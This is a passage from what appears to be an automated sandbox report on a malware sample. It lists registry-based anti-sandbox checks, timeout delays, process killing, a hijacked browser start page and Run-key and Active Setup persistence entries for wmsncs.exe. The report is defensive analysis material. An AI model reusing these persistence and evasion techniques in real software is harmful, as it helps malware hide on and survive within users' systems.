\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 Process not Found -
Checks processor information in registry 2 TTPs 16 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Process not Found Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 Process not Found Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Process not Found Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Setup.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 Process not Found Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 winit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe -
Delays execution with timeout.exe 7 IoCs
pid Process 1616 timeout.exe 4844 timeout.exe 4088 timeout.exe 2908 timeout.exe 2896 timeout.exe 1616 timeout.exe 1844 timeout.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
description ioc Process Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 Process not Found Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral Process not Found Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral Process not Found Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 Process not Found Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 Process not Found Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 Process not Found Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus Process not Found Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral Process not Found Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter Process not Found Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Process not Found Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses Process not Found Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses Process not Found Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController Process not Found Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 Process not Found Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 Process not Found Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 Process not Found Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral Process not Found Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral Process not Found Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController Process not Found Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter Process not Found Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 Process not Found Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController Process not Found Key deleted \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus Process not Found -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 4916 ipconfig.exe -
Kills process with taskkill 5 IoCs
pid Process 4832 taskkill.exe 2260 taskkill.exe 1156 taskkill.exe 5128 taskkill.exe 5164 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Microsoft\Internet Explorer\Main Process not Found Key created \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Key created \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Microsoft\Internet Explorer\GPU Process not Found Key created \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Internet Explorer\GPU Process not Found Key created \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Process not Found Key created \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Microsoft\Internet Explorer\Toolbar Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Process not Found Key created \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Microsoft\Internet Explorer\Main Process not Found -
Modifies Internet Explorer start page 1 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "www.blacksnake.com" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "www.blacksnake.com" Process not Found -
Modifies data under HKEY_USERS 19 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Spool Driver Service = "C:\\Windows\\system32\\spool\\drivers\\wmsncs.exe" wmsncs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Wins Service = "C:\\Windows\\system32\\wins\\wmsncs.exe" wmsncs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft wmsncs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\NvidMediaCenter = "C:\\Program Files (x86)\\Common Files\\System\\wmsncs.exe" wmsncs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Active Setup\Installed Components wmsncs.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server = "65534" wmsncs.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run wmsncs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Wmsncs Service = "C:\\Windows\\Fonts\\wmsncs.exe" wmsncs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wmsncs.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" wmsncs.exe Key created \REGISTRY\USER\.DEFAULT\Software wmsncs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Active Setup wmsncs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings wmsncs.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer = "65534" wmsncs.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" wmsncs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Active Setup\Installed Components\{103L3C30-C3B3-4130-9363-E59E1375PERM} wmsncs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Active Setup\Installed Components\{103L3C30-C3B3-4130-9363-E59E1375PERM}\StubPath = "C:\\Windows\\Fonts\\wmsncs.exe" wmsncs.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" wmsncs.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" wmsncs.exe -
Modifies registry class 64 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B691E011-1797-432E-907A-4D8C69339129}\6.0\0\win64 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{638F7C54-C160-4C7B-B2D0-E0337BC61F8C}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{41024bef-b4f0-52c7-88c5-db0b0132325a} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F41BE120-5234-4e7e-868E-85C6BC75CAAC} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{55F88890-7708-11D1-ACEB-006008961DA5} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E95754CA-B1D4-4A0B-AFE2-0C051752D9FB} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BC40BEC1-C493-11D0-831B-00C04FD5AE38} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3f3808e6-3dee-57a6-a88d-bacfb066c7fb}\ProxyStubClsid32 Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0" Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E6D28342-B70B-4677-9379-C9783FDFF8F4}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C7D3FC9E-C381-545C-A8AE-6A464EDB16A2}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6F81EA95-074E-48D4-AA96-62197E0AE96F} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{539698A0-CDCA-11CF-A5EB-00AA0047A063} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{BA35B84E-A623-471B-8B09-6D72DD072F25}\1.6\HELPDIR Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CF409217-79B9-4FB3-9F9C-9C13DBCEE658}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{87fbe12f-e7df-46fd-88d3-d53e212dd120}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{539698A0-CDCA-11CF-A5EB-00AA0047A063}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9B92EB61-CBC1-11D3-8C2D-00A0CC37B591}\1.2 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CC917F06-7EE0-47B8-9E1F-C3B48DF9DF5B}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{73FAA608-5F87-4D2B-9551-8440B1CBF54C}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7819A000-56F5-432F-BF43-662A11261696}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{51973C57-CB0C-11D0-B5C9-00A0244A0E7A} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FC4801A1-2BA9-11CF-A229-00AA003D7352}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{96CD11EE-ECD4-4E89-957E-B5D496FC4139}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{85DA4432-40BA-4221-8CA0-730B85E615AE} Process not Found Key created \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AF45AF49-D6AA-407D-BF87-3912236E9D94} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{89ce638a-f6ab-46d8-8f46-181eec332fe9} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{51973C41-CB0C-11D0-B5C9-00A0244A0E7A}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{51973C02-CB0C-11D0-B5C9-00A0244A0E7A} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{AB4D3FA3-21B9-443C-886E-FC4A417D3E4D} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BDDE0EEE-3B8D-4C82-B529-33F16B42832E} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9B4CD3F0-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E985809A-84A6-4F35-86D6-9B52119AB9D7}\9.0\0 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{70F6A204-76A4-4a2c-B4CE-29D5B55491A1} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DC24CDB5-15F5-5A1D-A60B-AE12F9F42F06}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{79EAC9EE-BAF9-11CE-8C82-00AA004BA90B}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{51973C23-CB0C-11D0-B5C9-00A0244A0E7A} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{5968D43D-D21E-437C-9C71-77C52C3E287A} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{51973C29-CB0C-11D0-B5C9-00A0244A0E7A} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8BF94B48-1E76-4AA3-AB1D-463F49B3E681} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6CDA2DC7-9013-4522-9970-2A9DD9EAD5A3} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{67A4B8EB-792E-5683-B625-4928884D39CA} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8e72fa52-4867-5696-b4d9-4ca23f19e177}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{79EAC9C9-BAF9-11CE-8C82-00AA004BA90B} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4495AD01-C993-11D1-A3E4-00A0C90AEA82}\TypeLib Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{41738EEA-442F-477F-92CF-2889BD6CD7E7}\1.0\0\win32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F3720D29-8D6D-4448-8CC4-1CAACA5673F6}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B722BCC7-4E68-101B-A2BC-00AA00404770} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9BE1BD30-B563-5475-8FDD-319DFEB064C4} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7855C6F6-B22C-4c2d-83DD-C45004979937} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FC098A45-913B-4914-B6C3-AE6304593E75}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EEE00921-E393-11D1-BB03-00C04FB6C4A6}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DA61CF34-65F0-493F-9B8C-EF5B539756EA} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\command Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E8E8D427-EF1B-4491-8E0D-3BAE38974C3E}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{71301ACE-093C-42C6-B0DB-AD1F75A65445}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{a6d9ba57-eeda-46c6-bbe5-e398c84168ac} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{64B6BF8D-4913-478B-B646-6E3D2F4A19A5}\ProxyStubClsid32 Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4A5AF829-CA32-4B01-AAE4-4C53D260E75C} Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{c942fc26-bea8-4b65-8b60-62a523d5fcd6}\ProxyStubClsid32 Process not Found -
Modifies system certificate store 2 TTPs 3 IoCs
